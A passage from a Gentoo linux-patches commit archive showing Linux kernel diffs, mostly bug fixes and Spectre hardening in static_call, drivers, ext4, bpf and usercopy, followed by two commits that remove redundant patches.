+@@ -25,12 +26,40 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     ASM_FUNC_ALIGN "\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -57,6 +86,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -68,9 +111,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -79,7 +122,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index e61dd039354b8..f74a977cf8f87 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -922,6 +922,9 @@ static void mcp2221_hid_unregister(void *ptr)
+ /* This is needed to be sure hid_hw_stop() isn't called twice by the subsystem */
+ static void mcp2221_remove(struct hid_device *hdev)
+ {
++	struct mcp2221 *mcp = hid_get_drvdata(hdev);
++
++	cancel_delayed_work_sync(&mcp->init_work);
+ }
+ 
+ #if IS_REACHABLE(CONFIG_IIO)
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index ba3fff17e2f9f..f9c3b1033ec39 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ #include <linux/bpf_mem_alloc.h>
+ 
+ #include <asm/barrier.h>
+@@ -1910,9 +1911,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/lib/usercopy.c b/lib/usercopy.c
+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-19 22:41 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-19 22:41 UTC (permalink / raw
  To: gentoo-commits

commit:     cdcf26623002d178b35231377a43ead33904784c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 19 22:41:33 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 19 22:41:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cdcf2662

Remove redundant patch

Removed:
2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ---
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ----------------------
 2 files changed, 45 deletions(-)

diff --git a/0000_README b/0000_README
index f16c77ca..8bb95e22 100644
--- a/0000_README
+++ b/0000_README
@@ -71,10 +71,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
-From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
-Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
deleted file mode 100644
index 0b454ec8..00000000
--- a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-gcc-plugins: Reorganize gimple includes for GCC 13
-
-The gimple-iterator.h header must be included before gimple-fold.h
-starting with GCC 13. Reorganize gimple headers to work for all GCC
-versions.
-
-Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
-Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 9a1895747b15..84c730da36dd 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -71,7 +71,9 @@
- #include "varasm.h"
- #include "stor-layout.h"
- #include "internal-fn.h"
-+#include "gimple.h"
- #include "gimple-expr.h"
-+#include "gimple-iterator.h"
- #include "gimple-fold.h"
- #include "context.h"
- #include "tree-ssa-alias.h"
-@@ -85,10 +87,8 @@
- #include "tree-eh.h"
- #include "stmt.h"
- #include "gimplify.h"
--#include "gimple.h"
- #include "tree-phinodes.h"
- #include "tree-cfg.h"
--#include "gimple-iterator.h"
- #include "gimple-ssa.h"
- #include "ssa-iterators.h"
- 
--- 
-2.34.1


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-19 22:39 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-19 22:39 UTC (permalink / raw
  To: gentoo-commits

commit:     5241ddd6b8b8c9729a51139525ff50ab4a7bf589
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 19 22:39:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 19 22:39:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5241ddd6

Remove redundant patch

Removed:
1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ----------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 22c89532..f16c77ca 100644
--- a/0000_README
+++ b/0000_README
@@ -55,10 +55,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
-From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
deleted file mode 100644
index 53075739..00000000
--- a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
-From: Liam Howlett <liam.howlett@oracle.com>
-Date: Wed, 11 Jan 2023 20:02:07 +0000
-Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
-
-mas_empty_area_rev() was not correctly validating the start of a gap
-against the lower limit.  This could lead to the range starting lower than
-the requested minimum.
-
-Fix the issue by better validating a gap once one is found.
-
-This commit also adds tests to the maple tree test suite for this issue
-and tests the mas_empty_area() function for similar bound checking.
-
-Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
-Fixes: 54a611b60590 ("Maple Tree: add new data structure")
-Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
-Reported-by: <amanieu@gmail.com>
-  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
-Tested-by: Holger Hoffsttte <holger@applied-asynchrony.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
----
- lib/maple_tree.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-(limited to 'lib/maple_tree.c')
-
-diff --git a/lib/maple_tree.c b/lib/maple_tree.c
-index 26e2045d3cda9..b990ccea454ec 100644
---- a/lib/maple_tree.c
-+++ b/lib/maple_tree.c
-@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	unsigned long *pivots, *gaps;
- 	void __rcu **slots;
- 	unsigned long gap = 0;
--	unsigned long max, min, index;
-+	unsigned long max, min;
- 	unsigned char offset;
- 
- 	if (unlikely(mas_is_err(mas)))
-@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, --offset);
- 
- 	max = mas_safe_pivot(mas, pivots, offset, type);
--	index = mas->index;
--	while (index <= max) {
-+	while (mas->index <= max) {
- 		gap = 0;
- 		if (gaps)
- 			gap = gaps[offset];
-@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, offset);
- 	}
- 
--	if (unlikely(index > max)) {
--		mas_set_err(mas, -EBUSY);
--		return false;
--	}
-+	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
-+		goto no_space;
- 
- 	if (unlikely(ma_is_leaf(type))) {
- 		mas->offset = offset;
-@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	return false;
- 
- ascend:
--	if (mte_is_root(mas->node))
--		mas_set_err(mas, -EBUSY);
-+	if (!mte_is_root(mas->node))
-+		return false;
- 
-+no_space:
-+	mas_set_err(mas, -EBUSY);
- 	return false;
- }
- 
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 30+ messages in thread

end of thread, other threads:[~2023-05-17 13:17 UTC | newest]

Thread overview: 30+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2023-03-11 14:08 [gentoo-commits] proj/linux-patches:6.2 commit in: / Mike Pagano
  -- strict thread matches above, loose matches on Subject: below --
2023-05-17 13:17 Mike Pagano
2023-05-11 16:11 Mike Pagano
2023-05-11 14:48 Mike Pagano
2023-05-10 17:52 Mike Pagano
2023-05-10 16:08 Mike Pagano
2023-04-30 23:50 Alice Ferrazzi
2023-04-26 13:21 Mike Pagano
2023-04-20 11:15 Alice Ferrazzi
2023-04-13 16:08 Mike Pagano
2023-04-06 10:40 Alice Ferrazzi
2023-03-30 21:52 Mike Pagano
2023-03-30 11:20 Alice Ferrazzi
2023-03-29 23:09 Mike Pagano
2023-03-22 16:10 Alice Ferrazzi
2023-03-22 12:44 Mike Pagano
2023-03-21 13:32 Mike Pagano
2023-03-17 10:42 Mike Pagano
2023-03-13 11:30 Alice Ferrazzi
2023-03-11 11:19 Mike Pagano
2023-03-10 12:37 Mike Pagano
2023-03-03 13:02 Mike Pagano
2023-03-03 12:27 Mike Pagano
2023-02-27 18:45 Mike Pagano
2023-02-27  3:48 [gentoo-commits] proj/linux-patches:6.2-2 " Alice Ferrazzi
2023-02-25 11:14 ` [gentoo-commits] proj/linux-patches:6.2 " Alice Ferrazzi
2023-02-26 17:30 Mike Pagano
2023-02-26 17:26 Mike Pagano
2023-02-25 11:02 Alice Ferrazzi
2023-02-19 22:41 Mike Pagano
2023-02-19 22:39 Mike Pagano

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox